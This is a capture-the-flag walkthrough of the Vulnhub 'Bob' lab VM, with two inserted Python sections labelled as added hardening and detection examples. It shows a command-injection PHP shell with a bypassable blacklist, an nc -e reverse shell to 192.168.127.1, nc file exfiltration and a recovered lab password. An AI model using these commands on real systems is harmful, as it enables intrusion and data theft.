[vulnhub] Bob_v1.0.1

Author: ckj123 | Source: published 2018-08-05 16:53, read 94 times


    First, scan the ports:
    nmap -sS 192.168.127.0/24
    Port 80 is open.

    Nmap scan report for 192.168.127.128
    Host is up (0.00059s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE
    80/tcp open  http
    MAC Address: 00:0C:29:E0:3F:33 (VMware)
    

    Visit the website.


    [Screenshot 2018-07-06 6:44:58 PM]

    When I first opened it I had no idea where to start =。=
    Then I remembered I had run a nikto scan earlier.

    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.127.128
    + Target Hostname:    192.168.127.128
    + Target Port:        80
    + Start Time:         2018-07-06 18:38:39 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.25 (Debian)
    + Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
    + OSVDB-3233: /icons/README: Apache default file found.
    + /login.html: Admin login page/section found.
    + 7539 requests: 0 error(s) and 10 item(s) reported on remote host
    + End Time:           2018-07-06 18:39:01 (GMT8) (22 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    

    Open http://192.168.127.128/dev_shell.php

    [Screenshot 2018-07-06 8:41:31 PM]
    http://192.168.127.128/passwords.html
    [Screenshot 2018-07-06 8:43:48 PM]
    http://192.168.127.128/lat_memo.html
    [Screenshot 2018-07-06 6:44:58 PM]

    Running lsattr in the shell reveals a lot (among other things, dev_shell.php.bak).

    Download dev_shell.php.bak:
    <html>
    <body>
      <?php
        //init
        $invalid = 0;
        $command = ($_POST['in_command']);
        $bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
      ?>
      <style>
        #back{
          position: fixed;
          top: 0;
          left: 0;
          min-width: 100%;
          min-height: 100%;
          z-index:-10
        }
        #shell{
          color: white;
          text-align: center;
        }
      </style>
      <div id="shell">
        <h2>
          dev_shell
        </h2>
        <form action="dev_shell.php" method="post">
          Command: <input type="text" name="in_command" /> <br>
          <input type="submit" value="submit">
        </form>
        <br>
        <h5>Output:</h5>
        <?php
          system("running command...");
          //executes system Command
          //checks for sneaky ;
          if (strpos($command, ';') !==false){
            system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
          }
          else{
            $is_he_a_bad_man = explode(' ', trim($command));
            //checks for dangerous commands
            if (in_array($is_he_a_bad_man[0], $bad_words)){
              system("echo Get out skid lol");
            }
            else{
              system($_POST['in_command']);
            }
          }
        ?>
      </div>
      <img src="dev_shell_back.png" id="back" alt="">
    </body>
    </html>
    

    You can see there is a blacklist inside:
    "pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"
    Fortunately it is not a regex match, so I used nc to get output echoed back.
    It is very simple: just call the executable from /bin by its full path:
    /bin/nc -e /bin/sh 192.168.127.1 4444
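The check in dev_shell.php only compares the first space-separated token against the list and otherwise hands the whole string to system(). The following Python is an added example, not code from the post or from the Bob VM: it re-implements that decision so the weakness can be tested, and sets beside it the allowlist-with-argument-validation approach a maintainer would use instead. The permitted programs and argument patterns (`uptime`, `date -u`, `dig <hostname>`) are a hypothetical policy chosen for illustration.

```python
import re
import shlex

# The blacklist from the page's dev_shell.php, reproduced verbatim.
BAD_WORDS = {"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"}


def devshell_blacklist_allows(command: str) -> bool:
    """Mirrors the dev_shell.php decision: reject a ';' anywhere, then reject
    only when the *first* space-separated token is a bad word.
    Returns True when the original PHP would have executed the command."""
    if ";" in command:
        return False
    first = command.strip().split(" ")[0]  # PHP: explode(' ', trim($command))[0]
    return first not in BAD_WORDS


# Hardened alternative (hypothetical policy): an allowlist of exact program
# names, each with a regex that the complete argument string must match.
ALLOWED = {
    "uptime": re.compile(r"^$"),                      # no arguments at all
    "date": re.compile(r"^(-u)?$"),                   # optional -u only
    "dig": re.compile(r"^[A-Za-z0-9.-]{1,253}$"),     # exactly one hostname
}


def allowlist_validate(command: str):
    """Returns (program, args) when the command matches the allowlist
    exactly, otherwise None. shlex tokenises the input so it is never handed
    to a shell; absolute paths and unknown programs fall through to None."""
    try:
        tokens = shlex.split(command)
    except ValueError:          # unbalanced quotes
        return None
    if not tokens:
        return None
    prog, args = tokens[0], tokens[1:]
    pattern = ALLOWED.get(prog)
    if pattern is None:
        return None
    if not pattern.fullmatch(" ".join(args)):
        return None
    return prog, args


if __name__ == "__main__":
    for cmd in ("ls -la", "/bin/nc -e /bin/sh 192.168.127.1 4444", "dig example.com"):
        print(f"{cmd!r}: blacklist allows={devshell_blacklist_allows(cmd)} "
              f"allowlist result={allowlist_validate(cmd)}")
```

The tuple returned by `allowlist_validate` is intended to be passed as an argument list to `subprocess.run` with `shell=False`, so the user's text never reaches a shell; the blacklist function is kept only to show that the page's `/bin/nc` input passes it while the allowlist rejects it. The real remediation for an endpoint like dev_shell.php is to remove it.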

    To get a nicer shell: python -c 'import pty;pty.spawn("/bin/bash")'
    First take a look at /etc/passwd:
    there is a user called bob.
    In /home/bob there is a Secret directory
    and a login.txt.gpg file, which is gpg-encrypted.
    Digging all the way down inside Secret there is an acrostic poem;
    it spells HARPOCRATES, so use that to decrypt:
    gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
    It cannot be decrypted locally because that asks for root privileges, so the only way is to transfer the file with nc:
    nc -lvp 1235 > login.txt.gpg    (receiving end)
    nc -w 3 192.168.107.129 1235 < login.txt.gpg    (sending end)
    Once received, decrypt it again:
    gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

    apple@ckj123 ~/hexo gpg --batch --passphrase HARPOCRATES -d login.txt.gpg                                              ✔ 12:18:33
    gpg: AES 加密过的数据
    gpg: 以 1 个密码加密
    bob:b0bcat_
    

    That gives the password.
    sudo cat flag.txt
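The chain above (apache2 running a shell from system(), /bin/nc -e handing a shell to a remote host as www-data, then the python pty upgrade) leaves a distinctive process tree on the box. The following Python is an added example and not code from the post or from the Bob VM: it runs a handful of process-start rules over constructed, simplified log records. The record format, field names and timestamps are invented for this example and are not auditd or any real product's syntax; the argv field stores the joined command line with inner quotes dropped for simplicity.

```python
import os
import shlex
from dataclasses import dataclass, field

WEB_USERS = {"www-data", "apache", "nginx"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELLS = {"sh", "bash", "dash"}
NET_TOOLS = {"nc", "netcat", "ncat"}
INTERPRETERS = {"python", "python2", "python2.7", "python3", "perl", "php"}

# Constructed sample records modelled on the walkthrough's steps (not real logs).
SAMPLE_LOG = [
    '2018-07-06T20:41:31Z user=www-data parent=apache2 exe=/bin/sh argv="sh -c lsattr"',
    '2018-07-06T20:45:02Z user=www-data parent=sh exe=/bin/nc argv="/bin/nc -e /bin/sh 192.168.127.1 4444"',
    '2018-07-06T20:45:03Z user=www-data parent=nc exe=/bin/sh argv="/bin/sh"',
    '2018-07-06T20:46:10Z user=www-data parent=sh exe=/usr/bin/python2.7 argv="python -c import pty;pty.spawn(/bin/bash)"',
    '2018-07-06T20:50:00Z user=bob parent=bash exe=/bin/cat argv="cat notes.sh"',
]


@dataclass
class ProcEvent:
    ts: str
    user: str
    parent: str                  # comm of the parent process
    exe: str                     # absolute path that was executed
    argv: list = field(default_factory=list)

    @property
    def prog(self) -> str:
        return os.path.basename(self.exe)


def parse_event(line: str) -> ProcEvent:
    """Parses one record of the constructed format:
    '<ts> user=<u> parent=<comm> exe=<path> argv="<command line>"'."""
    ts, rest = line.split(" ", 1)
    fields = dict(tok.split("=", 1) for tok in shlex.split(rest))
    return ProcEvent(ts, fields["user"], fields["parent"], fields["exe"],
                     shlex.split(fields["argv"]))


def classify(ev: ProcEvent) -> list:
    """Returns the names of every rule that fires for one process start."""
    hits = []
    if ev.user in WEB_USERS and ev.parent in WEB_SERVERS and ev.prog in SHELLS:
        hits.append("web_server_spawned_shell")      # PHP system() forking sh
    if ev.prog in NET_TOOLS and "-e" in ev.argv:
        hits.append("nc_exec_reverse_shell")         # nc -e <shell> <host> <port>
    if ev.prog in SHELLS and ev.parent in NET_TOOLS:
        hits.append("shell_child_of_nc")             # the shell nc -e executed
    if ev.prog in INTERPRETERS and any("pty" in a for a in ev.argv):
        hits.append("tty_upgrade")                   # python -c 'import pty;...'
    if ev.user in WEB_USERS and ev.prog in NET_TOOLS | INTERPRETERS and not hits:
        hits.append("web_user_ran_" + ev.prog)       # generic fallback
    return hits


def detect(lines) -> list:
    """Runs every rule over the records and returns (ts, rule) pairs in order."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in classify(ev):
            findings.append((ev.ts, rule))
    return findings


if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_LOG):
        print(ts, rule)
```

The first rule (a web-server user whose shell has the web server as parent) is the one that fires at the very first command sent to dev_shell.php, before any reverse shell exists; the `-e` and parent-of-shell rules then confirm the outbound connection, and the pty rule catches the interactive upgrade. Ordinary activity by a non-web user, such as the `cat notes.sh` record, produces no finding.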

    [Screenshot 2018-07-07 12:26:38 PM]

Article link: https://www.haomeiwen.com/subject/ypibvftx.html